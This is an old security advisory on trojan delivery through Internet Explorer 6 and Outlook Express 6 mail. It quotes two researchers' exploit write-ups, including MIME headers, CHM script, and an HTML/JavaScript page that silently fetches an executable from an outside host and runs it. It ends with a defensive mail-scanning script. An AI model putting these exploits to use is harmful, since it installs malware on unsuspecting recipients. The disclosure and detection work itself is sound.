
Opening Internet related content (web, news, mail) can lead to trojan delivery
2nd Apr 2002 [SBWID-5229]
COMMAND

	Opening Internet related content (web, news, mail) can  lead  to  trojan
	delivery

SYSTEMS AFFECTED

	 Internet Explorer 6.0, Outlook Express 6.0 and probably Outlook and
	 Outlook 2002.

	

	 Default settings for Outlook Express and Outlook: restricted zone.

PROBLEM

	'http-equiv' [http://www.malware.com] says:
	

	

	Internet explorer and accompanying mail  and  news  clients  divert  all
	external  files  into  the  Temporary  Internet  File  (TIF)  which   is
	controlled by the various security settings of the browser.  If  we  can
	strategically place our named files inside the TIF and  determine  their
	exact location, we are in business.
	

	How Do We Do That:
	

	Recent bandages applied to Internet Explorer  currently  transfer  files
	from mail and news to the  TIF  without  given  names  and  with  a  TMP
	extension.  Technically  the  mail  client  is  able  to  determine  the
	contents  of  these  *.TMP  files  through   the   Content-ID   protocol
	(cid:malware) whether the file is a sound file, html  file,  image  file
	etc. and based on the contents  coupled  with  the  given  Content-Type:
	image/gif render or parse accordingly.
	

	Through trivial html we are able to restore our  given  file  names  and
	dictate where our files are to be placed inside the TIF.
	

	Content-Type: audio/x-ms-wma;
	 name="malware.wma"
	Content-Transfer-Encoding: base64
	Content-ID: <mrs.malware>
	Content-Location: file:///malware.wma

	

	In order to ensure all our files end up in the same  folder  within  the
	TIF, we encapsulate the entire "package" in MIME  base64  so  that  as
	the self-contained mail message is opened within a particular folder  in
	the TIF, so  all  the  required  files  are  transferred  instantly  and
	silently into that same particular folder.
	

	[screen shot: http://www.malware.com/ca$h.png 11KB]

	

	And:
	

	Now that we have our named files in our known location inside  the  TIF,
	we need to access them to trigger off the entire event. We  utilise  the
	multi-purpose Windows Media Player  and  its  assortment  of  files.  We
	create a very simple media file with 0s URL flip and point that  to  our
	named file in our known location.
	

	 <iframe src="cid:mrs.malware" style="display:none">

	Content-Type: audio/x-ms-wma;
	 name="malware.wma"
	Content-Transfer-Encoding: base64
	Content-ID: <mrs.malware>
	Content-Location: file:///malware.wma

	

	Our named file it points to is a very simple *.html file comprising  our
	scripting to determine the location  like so:
	

	malware=document.URL;
	path=malware.substr(-0,malware.lastIndexOf("\\"));
	path=unescape(path);

	

	With this information, we utilise an existing possibility  to  call  our
	named *.chm file which has been delivered to  the  TIF  along  with  our
	primary message and  open  it.  Inside  our  *.chm  we  include  a  more
	sophisticated scripting to determine  yet  again  the  location  of  our
	third file, our *.exe which has  also  been  delivered  along  with  our
	primary message:
	

	var malware="malware[1].exe";
	document.writeln('<OBJECT id=AA classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=10 height=10>');
	document.writeln('<PARAM name="Command" value="ShortCut">');
	document.writeln('  <PARAM name="Item1" value=",'+cool.path+malware+',">');
	document.writeln('</OBJECT>');
	setTimeout("AA.Click();",3000);

	

	[screen shot: http://www.malware.com/ca$h.png 11KB]

	

	This in turn fires our *.exe that we have dropped into the TIF.
	

	Critical Note: it is imperative that our media file is delivered to  the
	TIF and opened from within the TIF through MIME  encapsulation.  Without
	this the URL flip when triggered will expect to find the  referenced
	file name on the server.
	

	Repeat:
	

	1. Our mail message  or  news  post  containing  our  4  critical  files
	[*.html,  *.chm,  *.wma,  *.exe]  is  fired  off  to  the   unsuspecting
	recipient.
	

	2. Upon opening the  mail  or  news  message,  all  embedded  files  are
	instantly transferred to the TIF with our given file names.  Note:  this
	is in addition to the exact same files transferred  in  accordance  with
	security as *.TMP files. Our 0s media file is then automatically  opened
	by our iframe. This in turn launches  the  Windows  Media  Player  which
	immediately URL flips to our named *.html file. Obviously,  because  the
	media file resides in the same folder  inside  the  TIF  as  our  *.html
	file, it will call the *.html file.
	

	3. Our *.html file is then opened in a new  browser  window  along  with
	the full path name of its  location.  Our  scripting  to  determine  the
	location and write it inside our *.html is fired. This in turn calls our
	*.chm file which is opened.
	

	4.  Our  *.chm  file  is  opened  and  our  sophisticated  scripting  to
	determine the location inside that, then  calls  our  *.exe  which  also
	resides in the same folder inside the TIF:
	

	[screen shot: http://www.malware.com/ca$h.png 11KB]

	

	BANG!
	

	The above represents by far the most successful method to achieve  this.
	Primarily because we can (a) dictate our file names and (b)  ensure  all
	necessary files are transferred to the same folder within the TIF.
	

	In the case of Outlook Express  default  settings  and  Outlook  default
	settings, where no scripting and no ActiveX is allowed, we  can  achieve
	similar results substituting our method  of  file  transference  in  the
	above, with a less than robust method. Simply put:
	

	a) embedded media file in iframe -- automatically opened  from  within
	the TIF -- no scripting
	

	b)   generic   html    tags    <img    src=malware.html...<bgsound
	src=*.chm...etc will deposit our required  files  inside  the  TIF--  no
	scripting but not always in the same folder. To do this we need to  draw
	the  files  remotely  from  a  server  in  order  to  ensure  they   are
	transferred with given file names. 5 out of  10  times  we  can  achieve
	success but in typical fashion the Internet  Explorer  6  browser  under
	unidentifiable  conditions  (at  whim),  can  transfer  each  file  into
	different folders inside the TIF.
	

	In the case of Internet Explorer 6 simply converting our  mail  or  news
	message to *.mhtml format and in particular  our  first  scenario  above
	where all files are embedded,  results  in  99.999%  success.  Obviously
	that 1% being the most important, and  that  is  launching  the  Windows
	Media Player in order to invoke our URL flip. No  matter  how  examined,
	despite  all  necessary  files  with  file  names  being  in  the  known
	location, it simply refuses to interpret the path to the media
	file. Without a doubt a solution is out there but we are out of time.
	

	Working Examples:
	

	Tested on fully patched Internet Explorer 6 and  Outlook  Express  6  on
	win98
	

	NOTE: all have about a 20 second delay
	

	1. All files fully embedded in the mail message. Open in mail client  in
	internet zone:
	

	Includes harmless *.exe
	

	http://www.malware.com/oxpress.zip

	

	note: there can be a possibility that  the  resulting  file  name  after
	transference differs from OS to OS.
	

	2. Media file fully embedded, all other files remotely  retrieved.  Open
	in mail client in restricted zone.
	

	Includes harmless *.exe
	

	http://www.malware.com/outlook.zip

	

	note 1: there is a great possibility that the resulting transference  is
	to different folders within the TIF.
	

	note 2: this is definitely not fool proof but by decreasing  the  amount
	of required files i.e. only *.chm and *.html with incorporation  of  the
	previous:
	

	C:\WINDOWS\SYSTEM\Mshta.exe,http://www.malware.com/foobar.hta

	

	link we can leave out the *.exe as it would appear that the  more  files
	transferred the more chances are different folders inside  the  TIF  are
	used.
	

	3. For Internet Explorer 6, simply convert 1  above  to  *.mhtml  format
	and give it a whack. Perhaps some bright spark knows how to remedy  this
	one. Good Luck !
	

	4. For the very few interested, we managed  to  compile  an  *.hta  file
	into a *.chm as well as a RFC822 mail message. Behaviour results in  the
	same as IE6. Nothing spectacular. Technically interesting results:
	

	http://www.malware.com/chm.zip

	

	

	 Update (03 April 2002)

	 ======

	

	On  the  same  trend  Elia  Florio  [eflorio@edmaster.it]   posted   the
	following exploit :
	

	When an HTML page attached to a message is started, it runs in the
	security zone of "\Temporary Internet Files" (TIF).
	

	First: we can use the "dynsrc" trick of IMG tag to  download  an  .EXE
	from the web - in a silent  way  -  into  TIF  zone.  NOTE:  if  we  use
	"src", the browser does not recognize the image format (because  it's
	an executable) and downloads it only in a partial way.
	

	Then - using javascript - we can get local path of "Temporary  Internet
	Files" folder where the page was stored from Outlook Express and  where
	the .EXE file will be downloaded. NOTE: we must add "[1]"  or  "[2]"
	or "[x]" at the end of .EXE  filename,  because  IE  renames  temporary
	downloaded files.
	

	Finally, using ".innerHTML" exploit and knowing the exact path of  the
	executable, we can run the .EXE file using this interesting trick:
	

	 - if we use a path which contains the string "\Temporary Internet Files",
	   IE will refuse to create ActiveX object for security restrictions and
	   does not run the .EXE file;

	 - but if we use old-dos path (c:\windows\tempor~1\content.ie5) instead of
	   long path (c:\windows\temporary internet files\content.ie5),
	   IE is fooled and runs the .EXE file;

	

	This is the JavaScript code for the HTML page (note: you must create  an
	HTML file and attach it to e-mail  message,  this  code  does  not  work
	written directly inside the e-mail, the HTML page must  be  opened  from
	Outlook Express)
	

	The exploit is easy to create if page  and  executable  have  a  similar
	name (for example EXPLOIT.HTML and EXPLOIT.EXE). The .EXE file  must  be
	uploaded into a web-site before.
	

	NOTE: exploit is not  an  "automatic  execution"  of  attachment,  the
	victim must open the attached HTML page.
	 

	<HTML>
	<SCRIPT LANGUAGE="JavaScript">
	function runtimer() {
	 //we must wait until .EXE file is copied to \Temporary Internet Files
	 timerID=setTimeout('runit()',7000)
	}

	function runit () {
	  //catch local path of .EXE file
	  var url = document.location.href;
	  var path1=url.substring(8,url.length-5)+"[1].exe";

	  //we need only the final path string
	  //it starts from /Content.IE5/xxyyzz/
	  i=0;
	  var found=false;
	  var path2="";
	  while(i<path1.length) {
	   if(path1.substring(i,i+2)=="/C") {found=true;}
	   if(found) {path2=path2+path1.substring(i,i+1);}
	   i++;
	  }

	  //this is the trick using dos name "Tempor~1" instead long names "Temporary Internet Files"
	  path2="C:/WINDOWS/Tempor~1"+path2;
	  alert("LOCAL PATH = "+path2);

	  //finally run it with help of .innerHTML
	  document.body.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE='+path2+'></OBJECT>';
	  }
	</SCRIPT>
	<body onLoad="runtimer()">
	<center>
	<h3>OUTLOOK EXPRESS Temporary Internet Files Locate&Execution</h3>
	<img src="_some_image.jpg"
	dynsrc="http://web.tiscali.it/funkybus/exploit.exe">
	<hr>
	<P>This page download (silently) an .EXE file using "IMG" tag
	into "\Temporary Internet Files" folder, then locate the local path
	of the .EXE using JavaScript and run it using .innerHtml exploit.</P>
	<hr>
	Exploit coded by Elia Florio
	(eflorio@edmaster.it)
	</center>
	</body>
	</html>

	

SOLUTION

	??
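
	Added example (not part of the advisories quoted above or of this
	entry): a mail-gateway style check for the message traits both write-ups
	depend on, namely a MIME part carrying a file: Content-Location, a hidden
	frame that opens a cid: part, and an IMG dynsrc pointing at an
	executable. The function name, finding labels and extension list are
	assumptions chosen for illustration.

```python
import email
import re
from email import policy

# Constructed sample modelled on the MIME headers and tags quoted above;
# the base64 body is a placeholder, not a media file.
SAMPLE = """\
Content-Type: multipart/related; boundary="b1"

--b1
Content-Type: text/html

<html><body><iframe src="cid:mrs.malware" style="display:none"></iframe>
<img src="x.jpg" dynsrc="http://example.test/exploit.exe"></body></html>
--b1
Content-Type: audio/x-ms-wma; name="malware.wma"
Content-Transfer-Encoding: base64
Content-ID: <mrs.malware>
Content-Location: file:///malware.wma

AAAA
--b1--
"""

RISKY_EXT = (".exe", ".chm", ".hta", ".wma", ".asf")  # assumed watch list
CID_FRAME = re.compile(r'<i?frame[^>]+src\s*=\s*["\']?cid:([^"\'\s>]+)', re.I)
DYNSRC = re.compile(r'dynsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)

def scan_message(raw):
    """Return sorted findings for one RFC 822 message given as a string."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings, cid_names, framed = set(), {}, set()
    for part in msg.walk():
        if part.is_multipart():
            continue
        loc = str(part.get("Content-Location", "")).strip()
        if loc.lower().startswith("file:"):   # part names its own local path
            findings.add("content-location-file-url:" + loc)
        cid = str(part.get("Content-ID", "")).strip().strip("<>")
        if cid:
            cid_names[cid] = (part.get_filename() or "").lower()
        if part.get_content_type() == "text/html":
            html = part.get_content()
            framed.update(CID_FRAME.findall(html))  # frames that auto-open a part
            findings.update("dynsrc-executable:" + u for u in DYNSRC.findall(html)
                            if u.lower().endswith(RISKY_EXT))
    findings.update("cid-frame-autoplay:" + cid_names[c] for c in framed
                    if cid_names.get(c, "").endswith(RISKY_EXT))
    return sorted(findings)
```

	Calling scan_message(SAMPLE) reports all three traits; a plain text
	message yields an empty list.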
